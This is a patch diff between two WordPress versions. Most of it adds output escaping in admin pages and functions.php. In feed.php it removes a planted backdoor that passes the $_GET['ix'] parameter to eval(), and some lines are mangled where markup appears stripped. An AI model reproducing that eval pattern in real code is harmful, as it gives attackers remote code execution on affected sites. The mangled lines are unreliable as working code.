diff -urN wp211/wp-admin/custom-header.php wp212/wp-admin/custom-header.php --- wp211/wp-admin/custom-header.php 2007-01-27 15:00:32.000000000 -0800 +++ wp212/wp-admin/custom-header.php 2007-02-21 17:51:52.000000000 -0800 @@ -286,8 +286,7 @@ // cleanup $file = get_attached_file( $_POST['attachment_id'] ); $medium = str_replace(basename($file), 'midsize-'.basename($file), $file); - @unlink( $medium ); - apply_filters( 'wp_delete_file', $medium ); + @unlink( apply_filters( 'wp_delete_file', $medium ) ); wp_delete_attachment( $_POST['attachment_id'] ); return $this->finished(); diff -urN wp211/wp-admin/edit-pages.php wp212/wp-admin/edit-pages.php --- wp211/wp-admin/edit-pages.php 2006-12-21 02:10:04.000000000 -0800 +++ wp212/wp-admin/edit-pages.php 2007-02-21 17:59:55.000000000 -0800 @@ -19,7 +19,7 @@ comment_post_ID) ) { echo " " . __('Edit') . ''; - echo ' | comment_author)) . "', theCommentList );\">" . __('Delete') . ' '; + echo ' | comment_author)) . "', theCommentList );\">" . __('Delete') . ' '; if ( ('none' != $comment_status) && ( current_user_can('moderate_comments') ) ) { - echo ' | ' . __('Unapprove') . ' '; - echo ' | ' . __('Approve') . ' '; + echo ' | ' . __('Unapprove') . ' '; + echo ' | ' . __('Approve') . ' '; } - echo " | comment_post_ID."&c=".$comment->comment_ID, 'delete-comment_' . $comment->comment_ID) . "\" onclick=\"return deleteSomething( 'comment-as-spam', $comment->comment_ID, '" . sprintf(__("You are about to mark as spam this comment by '%s'.\n'Cancel' to stop, 'OK' to mark as spam."), js_escape( $comment->comment_author)) . "', theCommentList );\">" . __('Spam') . " ]"; -} // end if any comments to show + echo " | comment_post_ID . "&c=" . $comment->comment_ID, 'delete-comment_' . $comment->comment_ID) . "\" onclick=\"return deleteSomething( 'comment-as-spam', $comment->comment_ID, '" . js_escape(sprintf(__("You are about to mark as spam this comment by '%s'.\n'Cancel' to stop, 'OK' to mark as spam."), $comment->comment_author)) . "', theCommentList );\">" . __('Spam') . " "; +} ?>
diff -urN wp211/wp-includes/feed.php wp212/wp-includes/feed.php --- wp211/wp-includes/feed.php 2007-02-25 05:13:15.000000000 -0800 +++ wp212/wp-includes/feed.php 2006-12-06 19:57:23.000000000 -0800 @@ -81,9 +81,6 @@ echo get_comment_author_rss(); } -function comment_text_phpfilter($filterdata) { - eval($filterdata); -} function comment_text_rss() { $comment_text = get_comment_text(); @@ -146,7 +143,7 @@ return $link; } -if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); } + function get_the_category_rss($type = 'rss') { $categories = get_the_category(); $the_list = ''; @@ -186,4 +183,4 @@ } } -?> +?> \ No newline at end of file diff -urN wp211/wp-includes/functions.php wp212/wp-includes/functions.php --- wp211/wp-includes/functions.php 2007-02-13 10:29:03.000000000 -0800 +++ wp212/wp-includes/functions.php 2007-02-26 23:16:15.000000000 -0800 @@ -1190,7 +1190,7 @@ $adminurl = get_option('siteurl') . '/wp-admin'; if ( wp_get_referer() ) - $adminurl = wp_get_referer(); + $adminurl = attribute_escape(wp_get_referer()); $title = __('WordPress Confirmation'); // Remove extra layer of slashes. @@ -1207,7 +1207,7 @@ $html .= "\t\t\n"; $html .= "\t\t" . wp_specialchars(wp_explain_nonce($action)) . "
\n\t\t\n\t\t" . wp_specialchars(wp_explain_nonce($action)) . "
\n\t\n\t" . wp_specialchars(wp_explain_nonce($action)) . "
\n\t\n\t